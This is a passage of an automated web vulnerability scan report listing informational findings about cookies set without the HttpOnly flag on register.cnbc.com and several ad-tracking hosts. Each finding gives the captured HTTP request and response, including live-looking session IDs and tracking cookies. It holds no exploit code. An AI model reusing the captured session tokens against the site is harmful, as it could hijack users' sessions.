Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H.....    Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:03:12 10:28:37.........
...[SNIP]...

13.171. https://register.cnbc.com/images/tile_02.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/tile_02.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/tile_02.gif HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:50 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "2c-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 44
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:50 GMT
Connection: close
Content-Type: image/gif
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/

GIF89a.......02;68@!.......,...........DnX.;

13.172. https://register.cnbc.com/images/wrong.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /images/wrong.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/wrong.jpg HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "3d8b-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 15755
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:01:40 GMT
Connection: close
Content-Type: image/jpeg
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:03:12 10:43:29.........
...[SNIP]...

13.173. https://register.cnbc.com/js/membercenter.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/membercenter.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/membercenter.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "13eb-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 5099
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/

//This variable is the only one that needs to be changed when the free web cam offer expires
var freeWebCamOffer="false";
//var freeWebCamOffer="true";

//We need to use the db index of "United States
...[SNIP]...

13.174. https://register.cnbc.com/js/prototype_ajax.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/prototype_ajax.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/prototype_ajax.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 06 May 2009 17:44:23 GMT
ETag: "1756a-46941f222cbc0"
Accept-Ranges: bytes
Content-Length: 95594
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

/* Prototype JavaScript framework, version 1.5.0
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype
...[SNIP]...

13.175. https://register.cnbc.com/js/registrationBasic.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/registrationBasic.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/registrationBasic.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT
ETag: "3e22-47d9ed5f8cdc0"
Accept-Ranges: bytes
Content-Length: 15906
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

//Field Validations - start
var goOptions = true;
var goAddrs1 = true;
var goAddrs2 = true;
var goPhone = true;
var goHhi = true;
var goIndustry = true;
var goStDsc = true;
var goCity = true;
...[SNIP]...

13.176. https://register.cnbc.com/js/registrationUtils.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/registrationUtils.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/registrationUtils.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Tue, 11 Aug 2009 10:38:41 GMT
ETag: "7cf-470db4e522e40"
Accept-Ranges: bytes
Content-Length: 1999
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

function toggleMessage(show, hide1, hide2){
var showObj = document.getElementById(show);
var hideObj1 = document.getElementById(hide1);
var hideObj2 = document.getElementById(hide2);
hideObj1.
...[SNIP]...

13.177. https://register.cnbc.com/js/registrationValidations.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/registrationValidations.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/registrationValidations.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT
ETag: "1dac-47d9ed5f8cdc0"
Accept-Ranges: bytes
Content-Length: 7596
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

//Field Validations - start
var goEmail = true;
var goEmailConf = true;
var goPwd = true;
var goPwdConf = true;
var goSecQstn = true;
var goSecAns = true;
var goScrnNm = true;
var goFrstNm = true;
var
...[SNIP]...

13.178. https://register.cnbc.com/js/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/s_code.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/forgotPassword.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT
ETag: "68d6-49fc8d80f4e80"
Accept-Ranges: bytes
Content-Length: 26838
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:51 GMT; path=/

/* SiteCatalyst code version: H.2.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/* Specify the Report Suite ID(s) to track here FEBRUARY 19 2008 UPDATE NBCU CMJ
...[SNIP]...

13.179. https://register.cnbc.com/js/validation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /js/validation.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/validation.js HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 29 Jul 2009 18:48:54 GMT
ETag: "184e-46fdca3891180"
Accept-Ranges: bytes
Content-Length: 6222
Connection: close
Content-Type: application/x-javascript
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/

// JavaScript Document
Validation = Class.create();
Validation.prototype = {
initialize: function(parameters, timeout, controls, responsetxt ){
    this.parameters            = this.generateParameterList(
...[SNIP]...

13.180. https://register.cnbc.com/quote-html-webservice/fvquote.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /quote-html-webservice/fvquote.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quote-html-webservice/fvquote.htm HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 231
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /quote-html-webservice/fvquote.htm was not found on t
...[SNIP]...

13.181. https://register.cnbc.com/quote-html-webservice/quote.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /quote-html-webservice/quote.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quote-html-webservice/quote.htm HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Length: 229
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /quote-html-webservice/quote.htm was not found on thi
...[SNIP]...

13.182. https://register.cnbc.com/refreshlogin.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /refreshlogin.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_cnbc.com_Prod_registration_servers_443

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/ HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:06 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:06 GMT; path=/


13.183. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgtix=BgABADMBSQABADMBHAAEADUBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:55:10 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

13.184. http://search.spotxchange.com/track/tag/6382.1008/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /track/tag/6382.1008/img

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

history-0
partner-0
user-0

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/tag/6382.1008/img HTTP/1.1
Host: search.spotxchange.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/17353/universal.html?page_name=netsuite_homepage&NetSuite_Homepage=1&mpuid=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUxMDMyNjMK; partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:37:47 GMT
Server: Apache
P3P: CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa"
Set-Cookie: history-0=eNrVkttygjAQhq%2Ftu7STEMXSOygBwxQyxcghdxi0BhCY6UHJ0zdKDw%2FQ2pleJrv%2Fv%2F9%2Bs8z2byCE08mdY06vlzgm9gPh2L3LWado%2B6JohRWVARB7ryqM5pVDC2wypyHVqRaapI13fCBzobpj6HayyCJVpsmW%2Bx7gSzIvmP5XGFAmUKjIjKLQjFgny733XKYrSQ1sRlU%2F6lUn8zQ2eBYA7dOIxur5%2FdkbUEmMyBVonIsNnanOs3iXIWdYI95zPxkyo6nHum0S%2BZ1JLII3joLdOvnyg1qvhK93Gd8nP5Cn5bZIH3Wm2gwZPkbuedb0syb2ScXTWbVJrGazcHrR1h%2B95HDeS%2Bcvfa%2FNUKJOu2tfNWqFpAhaEzbSnl2etlsPkbsC%2F4o2uwRtAG4vTRvqu1aRm6Of0A7V0%2FB3tO0D%2FeXbvnoHx%2BZvDQ%3D%3D; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
Set-Cookie: partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
Set-Cookie: user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUzMjM0NjcK; expires=Thu, 06-Sep-2012 15:37:47 GMT; path=/; domain=.spotxchange.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 15:37:47 GMT
Cache-Control: no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://cdn.spotxchange.com/media/thumbs/pixel/pixel.gif
Content-Type: text/html
Content-Length: 0


13.185. http://server.iad.liveperson.net/hc/52793056/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/52793056/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE
HumanClickSiteContainerID_52793056
LivePersonID

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/52793056/?&site=52793056&cmd=mTagKnockPage&lpCallId=802803296362-872958060353&protV=20&lpjson=1&id=5840223757&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:31 GMT
Server: Microsoft-IIS/6.0
